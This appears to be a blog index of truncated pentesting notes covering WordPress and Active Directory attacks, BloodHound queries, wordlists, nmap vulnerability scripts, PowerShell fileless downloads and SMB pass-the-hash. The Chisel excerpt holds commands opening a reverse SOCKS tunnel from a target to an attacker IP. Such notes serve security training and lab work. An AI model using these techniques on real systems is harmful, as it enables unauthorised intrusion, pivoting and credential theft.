WPscan es la herramienta más conocida para escanear un sitio con WordPress y la misma dispone de una API para integrarla con esta herramienta, lo que permite obtener más información de vulnerabilidades en temas y/o plugins, este tipo de escaneo… Read more ›
https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse Algunos de los tipos y permisos de objetos de Active Directory que interesan a los atacantes:GenericAll – permisos full al objeto (adicionar usuarios a un grupo o resetear la contraseña de usuarios)GenericWrite – actualizar los atributos de los objetos… Read more ›
https://hausec.com/2019/09/09/bloodhound-cypher-cheatsheet/ Setear todos los usuarios owned mediante Cypher query:En la lista se definen los usuarios owneados WITH [‘usuario1′,’usuario2’] as ownedlistUNWIND ownedlist as ownedWITH ownedMATCH (m:User {samaccountname:owned})SET m.owned=TRUERETURN m El cypher query puede ser ejecutado también en una sola línea WITH… Read more ›
Kaonashi, rockyou, entre otros https://weakpass.com/wordlist/big?page=2
https://geekflare.com/nmap-vulnerability-scan/ Nmap-vulnerscd /usr/share/nmap/scripts/git clone https://github.com/vulnersCom/nmap-vulners.gitnmap -sV –script vulners [–script-args mincvss=] <target>nmap -sV –script nmap-vulners/ -p80,223 <target>Ejemplo: sudo nmap -sU -sV –script vulners -p U:53 <target> Nmap – vulnnmap -sV –script vuln Nmap-vulscancd /usr/share/nmap/scripts/git clone https://github.com/scipag/vulscan.gitln -s pwd/scipag_vulscan /usr/share/nmap/scripts/vulscancd vulscan/utilities/updater/chmod +x… Read more ›
https://book.hacktricks.xyz/generic-methodologies-and-resources/tunneling-and-port-forwarding https://michmich.eu/Cheatsheets/internal/07-pivoting/ https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Network%20Pivoting%20Techniques.md Chisel You can download it from the releases page of https://github.com/jpillora/chisel You need to use the same version for client and server socks ./chisel server -p 8080 –reverse #Server — Attacker ./chisel-x64.exe client 10.10.14.3:8080 R:socks #Client —… Read more ›
https://academy.hackthebox.com/course/preview/file-transfers/windows-file-transfer-methods PowerShell DownloadFile Method We can specify the class name Net.WebClient and the method DownloadFile with the parameters corresponding to the URL of the target file to download and the output file name. File Download PowerShell DownloadString – Fileless Method As we previously discussed,… Read more ›
https://book.hacktricks.xyz/network-services-pentesting/pentesting-smbhttps://github.com/ShawnDEvans/smbmap Para realizar un listado recursivo -R, y con -p en lugar de la contraseña se puede usar el hash “NT:LM”